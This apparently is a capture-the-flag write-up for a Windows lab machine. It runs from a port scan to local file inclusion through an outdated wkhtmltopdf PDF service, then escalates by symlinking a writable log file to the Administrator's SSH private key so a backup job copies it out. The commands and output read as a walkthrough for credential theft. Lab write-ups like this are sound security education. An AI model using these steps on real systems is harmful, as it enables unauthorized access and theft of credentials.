$ nmap -p- --min-rate 4000 192.168.202.177
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-06 20:55 +08
Nmap scan report for 192.168.202.177
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
SSH was open on this machine, which was unusual for Windows.
WebPage to PDF -> LFI
Port 80 was rather simple:
I created a HTML file with one word within it, then hosted it on my HTTP server and submitted the URL with my IP. This returned a PDF:
I downloaded the PDF and used exiftool on it to enumerate any version:
$ exiftool ac354a9d4d469ef971709095540b2f42.pdf
ExifTool Version Number : 12.57
File Name : ac354a9d4d469ef971709095540b2f42.pdf
Directory : .
File Size : 6.6 kB
File Modification Date/Time : 2023:07:06 21:03:17+08:00
File Access Date/Time : 2023:07:06 21:03:17+08:00
File Inode Change Date/Time : 2023:07:06 21:03:25+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Title :
Creator : wkhtmltopdf 0.12.3
Producer : Qt 4.8.7
Create Date : 2023:07:06 06:02:52-07:00
Page Count : 1
Googling exploits for this version show that LFI is a possibility:
The exploit here is the content of the HTML file being used. Here's my PoC:
Now, we just need to find the correct file to read. The website gives us a username p4yl0ad, and SSH is open, so let's try to read the user's private key.
We also have write access over C:\xampp\htdocs\logs\request.log, meaning that we can create a symbolic link to make the script read and copy any file we want. Again, since SSH is open, we can attempt to get the admin's private key.
First we need to delete the logs directory:
p4yl0ad@SYMBOLIC C:\xampp\htdocs>del logs
C:\xampp\htdocs\logs\*, Are you sure (Y/N)? y
We cannot create a symbolic link to the private SSH key using conventional means because we aren't given access:
p4yl0ad@SYMBOLIC C:\xampp\htdocs\logs>dir
Volume in drive C has no label.
Volume Serial Number is 5C30-DCD7
Directory of C:\xampp\htdocs\logs
07/06/2023 06:22 AM <DIR> .
07/06/2023 06:22 AM <DIR> ..
07/06/2023 06:22 AM <JUNCTION> request.log [C:\Users\Administrator\.ssh\id_rsa]
But the above won't work. What worked was CreateSymlink.exe from this repo:
We can download and upload that binary. Then, we can run it:
p4yl0ad@SYMBOLIC C:\Windows\Tasks>.\CreateSymlink.exe "C:\xampp\htdocs\logs\request.log" "C:\users\administrator\.ss
h\id_rsa"
Opened Link \RPC Control\request.log -> \??\C:\users\administrator\.ssh\id_rsa: 00000174
Press ENTER to exit and delete the symlink
I waited for a while and then deleted the symlink. When we check the C:\backup\logs directory's newest file that is significantly larger than the rest, we find an SSH key:
Then, use this key to ssh in as the administrator: